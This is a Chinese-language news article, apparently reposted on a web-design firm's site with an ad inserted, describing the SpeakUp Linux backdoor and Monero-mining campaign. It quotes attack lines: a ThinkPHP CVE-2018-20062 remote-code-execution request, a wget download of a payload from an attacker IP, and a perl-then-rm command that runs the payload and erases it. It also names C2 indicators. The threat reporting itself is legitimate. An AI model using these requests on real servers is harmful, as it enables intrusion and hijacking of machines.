带你了解新型Linux服务器杀手——SpeakUP

  日前,全球屈指一首的Internet安全解决方案供应商Check Point IT安全部门研究人员发现了一个通过目前Linux服务器漏洞植入后门木马的黑客活动,此次攻击的目标涵盖了包括AWS主机在内的世界范围的全部服务器。攻击范围涵盖了共6个不同Linux发行版和macOS系统服务器中的已知漏洞,目前黑客的主要攻击目标集中在东亚与拉美地区的Linux服务器。

创新互联建站专注为客户提供全方位的互联网综合服务,包含不限于成都网站设计、成都网站制作、惠民网络推广、微信平台小程序开发、惠民网络营销、惠民企业策划、惠民品牌公关、搜索引擎seo、人物专访、企业宣传片、企业代运营等,从售前售中售后,我们都将竭诚为您服务,您的肯定,是我们大的嘉奖;创新互联建站为所有大学生创业者提供惠民建站搭建服务,24小时服务热线:18982081108,官方网址:www.cdcxhl.com

  全球SpeakUP“受害者”分部

  这次的恶意攻击的罪魁祸首被命名为SpeakUP,命名方式是以其中一台命令与控制(C2)服务器名称进行命名的。据悉Check Point的研究人员发现SpeakUP通过Linux服务器漏洞来植入后门木马的攻击方式可以绕过目前所有安全产品,这是由于该恶意软件中存储了大量此前出现过的攻击案例,致使SpeakUP可以优先识别目前存在的安全漏洞,并成功绕过几乎所有的杀毒软件的“双眼”。
  SpeakUP样本采集
  在Check Point的分析报告中显示,首次发现的SpeakUP样本是今年1月14日在我国的服务器上发现的,该样本曾在1月9日被上传至VirusTotal网站(专业的免费可疑文件分析服务网站)。但经过严密的监测后发现,没有一家安全产品将SpeakUP恶意软件标为恶意。

  这是因为为了逃避安全检测,SpeakUp的代码采用了base64加盐算法加密。不仅如此,C2通信也是采用了相同的方式加密。这也是为什么VirusTotal上的杀毒引擎无法将其检测为恶意的原因所在。
  SpeakUP感染全过程:
  植入脚本阶段
  根据Check Point报告中披露的数据来看,SpeakUP首先是利用ThinkPHP(轻量级PHP开发框架)的一个漏洞为攻击起点,从中植入一个PHP shell脚本。
  使用GET请求(如下所示),通过ThinkPHP远程代码执行漏洞CVE-2018-20062将shell脚本发送到目标服务器:
  s=/index/ hinkapp/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=echo ^>index.php
  这个shell脚本接下来会通过query中的“module”参数来执行命令。
  植入后门阶段
  在脚本生效之后,SpeakUP将进行像服务器植入后门的操作
  发送另一个HTTP请求(如下所示)到目标服务器:
  /?module=wget hxxp://67[.]209.177.163/ibus -O /tmp/e3ac24a0bcddfacd010a6c10f4a814bc
  实际上,这是一个注入过程,目的是植入ibus payload并将其存储到位置/tmp/e3ac24a0bcddfacd010a6c10f4a814bc
  启动后门并抹除痕迹阶段
  在植入后门成功后,SpeakUP将对服务器发送请求,启动后门,在启动后门后SpeakUP将通过删除文件来清楚自己的感染痕迹。
  使用如下HTTP请求来执行后门:
  /?module=perl /tmp/ e3ac24a0bcddfacd010a6c10f4a814bc;sleep 2;rm -rf /tmp/ e3ac24a0bcddfacd010a6c10f4a814bc
  SpeakUP感染后果:
  在Linux服务器被感染后,SpeakUP使用POST和GET请求来与C2通信,C2是被黑的speakupomaha[.]com.。
  第一个post请求会发送受害者ID和其他介绍性的信息,比如安装的脚本的当前版本等。
  对应的C2响应是needrgr,表示受感染的受害者之前未在服务器上注册,需要注册。
  之后,木马会通过执行以下的Linux命令来POST机器的全部信息:
  · Uname (-r, -v, -m, -n,-a, -s)
  · Whoami
  · Ifconfig –a
  · Arp –a
  · cat /proc/cpuinfo | grep -c “cpu family” 2>&1
  · who –b

  一旦受感染服务器注册完成,C2服务器就会发送新的任务——不同的C2服务器会命名受感染服务器来下载和执行不同的文件。
  有一个需要注意的点是,SpeakUP使用了User-Agent用户代理。具体来说,SpeakUp定义了三个用户代理,而受感染服务器在与C2服务器进行通信时必须使用这些代理。其中两个代理是MacOS X User-Agent,第三个是经过哈希处理的字符串:
  Mozilla/5.0 (iPad; U; CPU OS 3_2_1 like Mac OS X; en-us) AppleWebKit/531.21.10 (KHTML, like Gecko) Mobile/BADDAD
  Mozilla/5.0 (iPad; U; CPU OS 3_2_1 like Mac OS X; en-us) AppleWebKit/531.21.10 (KHTML, like Gecko) Mobile/7B405
  E9BC3BD76216AFA560BFB5ACAF5731A3

  目前,SpeakUp主要服务于XMRig矿工,为其提供“肉鸡(受感染服务器)”。根据XMRHunter网站的查询结果显示,攻击者的钱包目前拥有约107枚门罗币。
  SpeakUP强大的自我传播能力
  攻击者还为SpeakUp配备了一个“i”模块,它实际上是一个python脚本,使得SpeakUP能够扫描和感染位于受感染服务器所处内网和外网的其他更多的Linux服务器。其主要功能有:
  使用预定义的用户名和密码来暴力破解尝试登陆管理面板;
  扫描受感染服务器的网络环境,检测共享相同内部和外部子网掩码的服务器上的特定端口的可用性;
  尝试利用目标服务器上的远程代码执行漏洞


名称栏目:带你了解新型Linux服务器杀手——SpeakUP
浏览地址:http://scyanting.com/article/cioopg.html